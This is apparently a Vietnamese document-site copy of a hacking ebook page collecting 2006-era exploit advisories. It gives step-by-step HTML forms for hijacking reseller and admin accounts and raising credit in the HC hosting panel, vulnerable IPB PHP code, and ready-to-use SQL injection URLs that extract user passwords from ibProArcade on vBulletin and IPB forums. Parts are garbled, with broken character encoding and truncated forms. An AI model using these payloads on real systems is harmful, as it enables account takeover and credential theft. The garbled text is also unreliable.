Hacker Professional Ebook part 378 ppt

Note: Also by this code, everyone can increase its Credit value then buy every host... now goto userlist, if there is a user that will enough and if no user available, u must make it!. n

Trang 1

<td>txtcardno</td>

</tr>

</table>

</form>

-

===============================================

2- This code list all of resellers then you must change a password of one of them then login by it for next step

Note: Also by this code, everyone can increase its Credit value then buy every host

-

<form

action="http://[url]/Admin/Accounts/AccountActions.asp?ActionType=UpdateCre ditLimit" method="post">

<table>

<tr>

<td>Username:</td>

</tr>

<tr>

<td>Description:</td>

</tr>

<tr>

<td>FullName:</td>

</tr>

<tr>

<td>AccountDisabled 1,[blank]:</td>

</tr>

<tr>

<td>UserChangePassword:</td>

Trang 2

</tr>

<tr>

<td>PassCheck=TRUE,0:</td>

</tr>

<tr>

<td>New Password:</td>

</tr>

<tr>

<td>DefaultDiscount%:</td>

</tr>

<tr>

<td>CreditLimit:</td>

</tr>

</table>

</form>

-

===============================================

3- Now you must login by a resseler that changed password from last step now goto userlist, if there is a user that will enough and if no user available, u must make it!

now select it and click Enter to enter by that user now the bug will be available: each reseller can gain every user session even "HCADMIN" by bug in

"Check_Password.asp"

below code will help you:

-

Form1<br>

Trang 3

<table>

<tr>

<td>AdName</td>

</tr>

</table>

</form>

-

===============================================

-

Finder: Soroush Dalili (http://www.google.com/search?hl=en&q="soroush+dalili") Email: Irsdl[47]Yahoo[d07]com

Team: GSG (Grayhatz Security Group) [Grayhatz.net]

Thanks from:

Farhad Saaedi (farhadjokers[4t]yahoo[d0t]com)

Small.Mouse from Shabgard.org (small.mouse[4t]yahoo[d0t]com)

Kahkeshan Co (IT Department) (www.kahkeshan.com)

Related URLs:

http://hidesys.persiangig.com/other/HC_BUGS_BEFORE3.2.txt (all hc bugs by Irsdl)

http://hidesys.persiangig.com/other/HC%20Hack%20Prog.rar [password:

grayhatz.net] (HC automation hacking program source code by simple VB)

# milw0rm.com [2006-07-06]

vns3curity(HCE)

Trang 4

IBP Exploits 1.3.1

Trích:

Advisory number VI

+++++++++++++++++++++

+ +

+ ||| ) || || +

+ ||| ) ||_|| +

+ | _) | | | _ | +

+ || || || +

+ +

+++++++++++++++++++++

http://pro-hack.ru

Product: IBP <= 1.3.1

programming language: php

Îñîâởíîñòỉ: đ ýíñïịîĩòơ ïîíăìăí ỉíòơðơñíûĩ ìơòîô ïîôâîðă ïăðîịÿ ñ ïîìîùüþ like (î÷ởü ïðîñòî)

Security searching: Advice

Bug level: Moderate

Ìîôơðằîð ìîươò ïîôíÿòü ñđîỉ ïðăđă íă ôîðóìơ

Íơôîñòằî÷íăÿ ôỉịüòðăöỉÿ ôăííûõ

if ($ibforums->input['move_id'] == "" or $ibforums->input['move_id'] == -1)

{

$std->Error( array( 'LEVEL' => 1, 'MSG' => 'move_no_forum' ) );

Trang 5

}

// -

if ($ibforums->input['move_id'] == $ibforums->input['sf'])

{

$std->Error( array( 'LEVEL' => 1, 'MSG' => 'move_same_forum' ) );

}

// -

$DB->query("SELECT id, subwrap, sub_can_post, name, redirect_on FROM ibf_forums WHERE id

IN(".$ibforums->input['sf'].",".$ibforums->input['move_id'].")");

http://pro-hack.org/exploits/our/ipb1.3_m_t_a.txt

Tự dịch nhá, lấy từ Pro-hack.ru

ai có ý kiến gì không ?

QX147(HCE)

ibProArcade 2.x module (vBulletin/IPB) Remote SQL Injection Exploit

IPB:

index.php?act=Arcade&module=report&user=-1 union select password from

ibf_members where id=[any_user]

vBulettin forums:

index.php?act=ibProArcade&module=report&user=-1 union select password from user where userid=[any_user]

Tiêu đề	Hacker Professional Ebook Part 378 Ppt
Tác giả	Soroush Dalili
Người hướng dẫn	Farhad Saaedi
Trường học	Kahkeshan Co.
Chuyên ngành	IT Security
Thể loại	Ebook
Năm xuất bản	2006
Thành phố	Tehran

Định dạng
Số trang	5
Dung lượng	64,23 KB